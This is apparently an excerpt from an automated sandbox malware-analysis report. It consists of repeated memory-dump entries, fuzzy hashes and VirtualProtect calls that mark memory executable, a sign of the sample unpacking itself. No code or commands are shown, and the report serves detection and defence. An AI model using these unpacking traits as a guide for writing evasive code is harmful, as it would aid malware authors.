                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 9034ddbb591a576b9b18d06545e59d8e42765c4c59f9a9049f262cd1a78737f7
                                                                          • Instruction ID: 2fccd4c6e96c30abce259f49a498f6514dc93fb82ca636409459af9d4564313c
                                                                          • Opcode Fuzzy Hash: 9034ddbb591a576b9b18d06545e59d8e42765c4c59f9a9049f262cd1a78737f7
                                                                          • Instruction Fuzzy Hash: C76114B2D185189BFB248A24DC58BEB7635FF94310F1541FAD60D97280E6794FC18B52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7df069c22b070e4dbce3fbaba68f8b45c469873dd1456e3778673242fc6de5df
                                                                          • Instruction ID: 5fa1a3e9bdde34c1616e9002a50f7752155f6833c9fed4a4850a4fde2c5b41c7
                                                                          • Opcode Fuzzy Hash: 7df069c22b070e4dbce3fbaba68f8b45c469873dd1456e3778673242fc6de5df
                                                                          • Instruction Fuzzy Hash: 2251D0F2D00129AFF7248A14DC49BFA7679FB44314F1441BEE90DA6280E6B95FC58F92
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: bd7c5ec803f87cc8bad7073c1149f8e6b735919cad557e51b1361a2f05cd2ce1
                                                                          • Instruction ID: 95999e3c89b100462e77da41553b97e8eaef20c202440d4a04a147192455b0ce
                                                                          • Opcode Fuzzy Hash: bd7c5ec803f87cc8bad7073c1149f8e6b735919cad557e51b1361a2f05cd2ce1
                                                                          • Instruction Fuzzy Hash: F95124F3D041589FF7288A24DC58AFB7B79EB80314F1541FAEA0D96680D6785FC48A52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 789f4e9411f719f4010c87672db50a874d11701a8ce872b3a3eb2fa5eba652b3
                                                                          • Instruction ID: 655b66b66fb3469e843ff06a3b7658a6c79e08d25993d11ec81e1375dca056d5
                                                                          • Opcode Fuzzy Hash: 789f4e9411f719f4010c87672db50a874d11701a8ce872b3a3eb2fa5eba652b3
                                                                          • Instruction Fuzzy Hash: BD4170A2D041589FEB249E28CC587FB3B78FB81318F1841BED58E95541D63889C5CB53
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ba2a7fa4999bb88b7052507f9bf31335abb7ea01928c3d0f94d229b2e4d4965
                                                                          • Instruction ID: 73ac19938a00a8fefeca1e080fe06b1805db16bd3c469665e510f0587d7ba46c
                                                                          • Opcode Fuzzy Hash: 7ba2a7fa4999bb88b7052507f9bf31335abb7ea01928c3d0f94d229b2e4d4965
                                                                          • Instruction Fuzzy Hash: CA41F5B2E041699EEF298A14DC94BFF7775FF82305F1D41F9D40EA6540D2789EC08A82
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: dfdc0cf30b1725b9cc716d5655bd0f77ffd49ef285ce22cd93555cd69a599010
                                                                          • Instruction ID: b3f4b5fe665517ab53c445c9b734ceb4b72e77dbc9d7ad8798fdd5691aefa76a
                                                                          • Opcode Fuzzy Hash: dfdc0cf30b1725b9cc716d5655bd0f77ffd49ef285ce22cd93555cd69a599010
                                                                          • Instruction Fuzzy Hash: 934136B2D041299EE7249A14CC54AFA7B79EB41304F0401FDE94D92281E7B95EC5CF52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 7b91a2ec8261426cfbf6f26c3f77236b5d31f1999c48dba740422898afeb20b2
                                                                          • Instruction ID: 03a1e2e10bd3254ca763605fb56556c8b521c7494e39ad1099763666dd766f41
                                                                          • Opcode Fuzzy Hash: 7b91a2ec8261426cfbf6f26c3f77236b5d31f1999c48dba740422898afeb20b2
                                                                          • Instruction Fuzzy Hash: 9841E671D0413C8BDB25CB14CC95AEA7BB5FB81316F1081EADD4EAB280CA385EC68F51
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c210ab731d874dc872a41d6e0a963165080072cd7dd775ebd9e3dbb815b56102
                                                                          • Instruction ID: 951736ee9a693ef9db3f85c27f97c3821101ba9db4bdfc217f4c94a49c57cab4
                                                                          • Opcode Fuzzy Hash: c210ab731d874dc872a41d6e0a963165080072cd7dd775ebd9e3dbb815b56102
                                                                          • Instruction Fuzzy Hash: DB4122B2D042299ED7249B14CC64BFA7BB9EB41304F0400FEE54992280E3B85AC4CF52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f2a9992be07d1199784b7d8880cfc0a0dc84b93246656796f6eb3e28987eac87
                                                                          • Instruction ID: 72a765c590dbfe7296148481d1c5c7de63ca8bf7cbdc70716535ee1f2e2b54c9
                                                                          • Opcode Fuzzy Hash: f2a9992be07d1199784b7d8880cfc0a0dc84b93246656796f6eb3e28987eac87
                                                                          • Instruction Fuzzy Hash: E0314BB2C08414EBF7144554EC1CBFB7A68FB90318F1682BDE90E95580EA7C5BC59AD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 19710997a46b20bec6bb0b1ecf6634289ed259d61bd64c1d3194523ddf2444e0
                                                                          • Instruction ID: 8d316a8d76c45f02aa7c361d44b9e0b398d9b6b1d374aff8c7f79c42679229a8
                                                                          • Opcode Fuzzy Hash: 19710997a46b20bec6bb0b1ecf6634289ed259d61bd64c1d3194523ddf2444e0
                                                                          • Instruction Fuzzy Hash: 2131A1A2D081585FFB159A34CC547BA3B68FB52318F1D02FED54AD6481D23C8AC58753
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 847d49a862e83f3c450a6c56030379055bfd9c182e2dc7a5b34ecdc07cb53058
                                                                          • Instruction ID: 774e191aaeff13e537f9dbec094ca35544b3c767b9e0f77404e115f0410cc0e8
                                                                          • Opcode Fuzzy Hash: 847d49a862e83f3c450a6c56030379055bfd9c182e2dc7a5b34ecdc07cb53058
                                                                          • Instruction Fuzzy Hash: 0131E8B2D081249BF7248654DC18BFB7B64FB50318F1682B9E50E96540E67C9FC58AD2
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: e7815df2dc065e0d45c16e360d812d9dbd0cbe4f3b33cadc7bea38bcc960339b
                                                                          • Instruction ID: bd1ef9c16fc6c187fa9df403fa03dd0330f8d73c48b26767566bafbef7036a3c
                                                                          • Opcode Fuzzy Hash: e7815df2dc065e0d45c16e360d812d9dbd0cbe4f3b33cadc7bea38bcc960339b
                                                                          • Instruction Fuzzy Hash: E23122B2D0522A9FD7249B14CC68AFA7B79FB01304F0011FEE54E96281E3B95EC58F52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 5c420de0f2c638d4862a81fb380890718c1e634e8b696181794fcde16fe03277
                                                                          • Instruction ID: 73cc3fa18bdc6d3f02082728a8b6af9541978f285c0e08f2d4c31626866732aa
                                                                          • Opcode Fuzzy Hash: 5c420de0f2c638d4862a81fb380890718c1e634e8b696181794fcde16fe03277
                                                                          • Instruction Fuzzy Hash: 8E3116B1D092549FEB10CB24DC90AEB7BB8EBD6304F2080FED40996641D67D9FC68B52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7d18c14f579e6effa7516fb01f9ea394f8f1dde9167f7fe1aca2fcc900ea643
                                                                          • Instruction ID: 67b4d90b351513ea0e4114ea93b879abe59119faeef5bb121ce071dba1522dca
                                                                          • Opcode Fuzzy Hash: d7d18c14f579e6effa7516fb01f9ea394f8f1dde9167f7fe1aca2fcc900ea643
                                                                          • Instruction Fuzzy Hash: 2E3107B3D0112A6EF7209A14DC49AFBB63DEB41354F1440BEE90DE6180E6B95FC58B92
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 7ca5bc78045b4d0d9d048d41b94a6cc62a61b9a92af307a51fa670321cf8d543
                                                                          • Instruction ID: 74e271967addb6eace3505c3c7dd5716fea2fb4734c380ebf5750fd4c0da210a
                                                                          • Opcode Fuzzy Hash: 7ca5bc78045b4d0d9d048d41b94a6cc62a61b9a92af307a51fa670321cf8d543
                                                                          • Instruction Fuzzy Hash: EE3146F2D092599FE7149B14CCA4AFA7B79FB40304F0401FED54D96281D2B96AC5CF52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: bfd1c7210f71c79d53d09cfc39ff2b6d80358bb089189b69140d3e7f91d366c7
                                                                          • Instruction ID: 5e9a095423f277184991fa78fc0ced27fce0ed9b67f702ae1c627998e6ef464b
                                                                          • Opcode Fuzzy Hash: bfd1c7210f71c79d53d09cfc39ff2b6d80358bb089189b69140d3e7f91d366c7
                                                                          • Instruction Fuzzy Hash: DC31E571D0412C9FDB29DF14CC90AEA7B75FB81315F2081EADD4AAB281CA385EC68F51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a5018c06cba4a4c0eedffcf386e1009d4b1dd9c18372fb44097e4b914e5e5db0
                                                                          • Instruction ID: 396977ef5c45202d3d444a5b3b783738e0e517c1735952024baeb9227ddd57a9
                                                                          • Opcode Fuzzy Hash: a5018c06cba4a4c0eedffcf386e1009d4b1dd9c18372fb44097e4b914e5e5db0
                                                                          • Instruction Fuzzy Hash: 5D3108B3D0013A6EF7209A14DC85AF7B63DFB41354F1440BAE90DE6180E6B95FC58B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 230c827c2bcc1451100f71b90fe900ec401267009e270f38d91386909a084351
                                                                          • Instruction ID: 406d6666b366800ec15b3a2d686d5a317fd20c02c441350a10317b61ad7b3102
                                                                          • Opcode Fuzzy Hash: 230c827c2bcc1451100f71b90fe900ec401267009e270f38d91386909a084351
                                                                          • Instruction Fuzzy Hash: 8731F6B3D0113A6EF7209A14DC85AF7B63DFB41354F1440BAE90DA6180E6B95EC58B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 051bcc4ba0219d67a7fd8eeea3cad0c3adefdeb032f3e9d937a96177f3bed3b6
                                                                          • Instruction ID: 202273a8e9b0d47d8204487caa72bfecfa2420aef87116b3e540095bfea9dca1
                                                                          • Opcode Fuzzy Hash: 051bcc4ba0219d67a7fd8eeea3cad0c3adefdeb032f3e9d937a96177f3bed3b6
                                                                          • Instruction Fuzzy Hash: 3A3108B3D0013A6EF7209A14DC85AF7B67DFB41354F1440BAE90DE6180E6B95FC58B92
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: bf7e5230cc2225699a243706d657f6e632b74cf230570235f6d8b1ffc991af7b
                                                                          • Instruction ID: 4094304c428602170225a891eeb3eb80f507308acb6715806446eae804940a66
                                                                          • Opcode Fuzzy Hash: bf7e5230cc2225699a243706d657f6e632b74cf230570235f6d8b1ffc991af7b
                                                                          • Instruction Fuzzy Hash: 86216DF3C08414ABF7144114EC1DBFB7A28FB91328F1A42B9E90E95580E97C4FC582D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: ccf2598829a3369240b414ca9e1356613373dbdc376e4678dd126e77ff787c41
                                                                          • Instruction ID: de01d74ae848bc4f3757e9f47326cc1e19d1d71e85b9e4b71dc10aa458def387
                                                                          • Opcode Fuzzy Hash: ccf2598829a3369240b414ca9e1356613373dbdc376e4678dd126e77ff787c41
                                                                          • Instruction Fuzzy Hash: 29213CF2D08014ABF7144554EC1CAFB7A28FB90328F1642B9E50E95540E57C9BC58692
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: e869e0a98d1f1daf5484f8019fb33690fec603e899e7df32ecb35ac8630fba62
                                                                          • Instruction ID: f8cac51df934313cd700eb4b673b9e46ca9ad0ca05bbd003f8908fbf44f5289f
                                                                          • Opcode Fuzzy Hash: e869e0a98d1f1daf5484f8019fb33690fec603e899e7df32ecb35ac8630fba62
                                                                          • Instruction Fuzzy Hash: 1731D3B2E085586FE7208A54ED54BEF7BB5EBC5310F0841F9E50D9B281D2386E85CE52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 84879a3934b9d74a6a8fc653b88d7597a876f980107f80e9dc2b7d52b7fc346e
                                                                          • Instruction ID: 232c437fc6f7f957fa43de25209a523d2a0cb9449eb21733cee1449b7a788a21
                                                                          • Opcode Fuzzy Hash: 84879a3934b9d74a6a8fc653b88d7597a876f980107f80e9dc2b7d52b7fc346e
                                                                          • Instruction Fuzzy Hash: 2B31CFB19051689FEB28CB10DC95BFE7739FBC4300F1081FAE50AA6240D6385EC18F95
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 037960cbb5e869dfc19194279bc94faeffe83382247785357e4bc9fcc3b56088
                                                                          • Instruction ID: 69822767a2e812ec6d95a0ffef9a6ac4c81c793c8134abbcd6d8c0c112320fdb
                                                                          • Opcode Fuzzy Hash: 037960cbb5e869dfc19194279bc94faeffe83382247785357e4bc9fcc3b56088
                                                                          • Instruction Fuzzy Hash: 9D31F4B2E085686FE720CA54EC54BEE7BB5EFD9310F0441F9D50DAB281D6386E818E52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 60d7dd2059e88019fee37e967b700d0301887688f6304cc181d448fce9226891
                                                                          • Instruction ID: 36768458c7a5fcc1c1c90ec03d81f5221113e2083688eba971a13383f04ac54a
                                                                          • Opcode Fuzzy Hash: 60d7dd2059e88019fee37e967b700d0301887688f6304cc181d448fce9226891
                                                                          • Instruction Fuzzy Hash: 6631D3F2D045299FE7288A14CC58BFA7779FB40308F0411FED60A96281E7B96AC48F52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: d82eac0d1f590f019583a2221f848b79520e365a740b4189b5cae2ed0d10ba65
                                                                          • Instruction ID: bd229d9db80df69df8b0f7a5409f51821e157a93d67123e7d67332ae74c1c3e1
                                                                          • Opcode Fuzzy Hash: d82eac0d1f590f019583a2221f848b79520e365a740b4189b5cae2ed0d10ba65
                                                                          • Instruction Fuzzy Hash: ED31A1B1E05568AFEB21CB14DC54BEE7BB5EF99310F0441E9D50DA7281D6386F80CE52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f805768babbab2d46ffab81188c1402197cbe46ab158122426689d43103fc5dd
                                                                          • Instruction ID: c985afb57b85848839efff5cbbcd76f2e79f1e403b7dd3f1ca46c46083b0b69d
                                                                          • Opcode Fuzzy Hash: f805768babbab2d46ffab81188c1402197cbe46ab158122426689d43103fc5dd
                                                                          • Instruction Fuzzy Hash: 4421E4B2D041199FFB188A10DC95BFB7738F791324F1841FED50EA6680E6799EC08E96
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886657676.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 0083C000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_83c000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c7c64b6eff35db82bfdb0fcb5bdd5844de3a72dccaede2766951d19ac67e5b77
                                                                          • Instruction ID: fa2f5e7e2c5777b4db31eb45f9e1ea56f552fc4be7030fbe414ef0b514a310c7
                                                                          • Opcode Fuzzy Hash: c7c64b6eff35db82bfdb0fcb5bdd5844de3a72dccaede2766951d19ac67e5b77
                                                                          • Instruction Fuzzy Hash: C9317CB19041299BEB64CB14DC95BFE7775FB84310F2082EAE50AA6280DA395EC18F95
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: a1d7206231dc7d26b070d25920c27dfd1303d2c1c917fb5b100097477ab86d4e
                                                                          • Instruction ID: 1bd81fb2dd509dbb2d8ec2d1d8e75de1986bf0c148e8d3fad2dcafe0f3bff4f5
                                                                          • Opcode Fuzzy Hash: a1d7206231dc7d26b070d25920c27dfd1303d2c1c917fb5b100097477ab86d4e
                                                                          • Instruction Fuzzy Hash: E031CFB2E04168AFEB20CB14DC54BEE7BB5EF89310F0441F9E50DA7241D6386E80CE52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: b78fcf0abfa9e745093fad1e912ee680c904a47f8465ced38266b7ce4d06680c
                                                                          • Instruction ID: 7f9e843f9e95bcee2bb8f28ed48b2986318b88b9ae9d59bad9bdbea0c43ccbf2
                                                                          • Opcode Fuzzy Hash: b78fcf0abfa9e745093fad1e912ee680c904a47f8465ced38266b7ce4d06680c
                                                                          • Instruction Fuzzy Hash: 6631BEB2E04168AFEB20CA14DC54BEE7BB5EB99310F0441E9D50DA7241D6386E81CE52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f28729200df5bf10c7e7b44f0e7b6607405c130536026fc8aec0deded24b0992
                                                                          • Instruction ID: 9bfbe79a7884fa21eefaaa5ccc484148dd2da61494d5945b23147c350f8fd347
                                                                          • Opcode Fuzzy Hash: f28729200df5bf10c7e7b44f0e7b6607405c130536026fc8aec0deded24b0992
                                                                          • Instruction Fuzzy Hash: 3931CFB2E05168AFEB20CB14DC54BEE7BB5EF89310F0441F9D50DA7281D6386E80CE52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0083C498
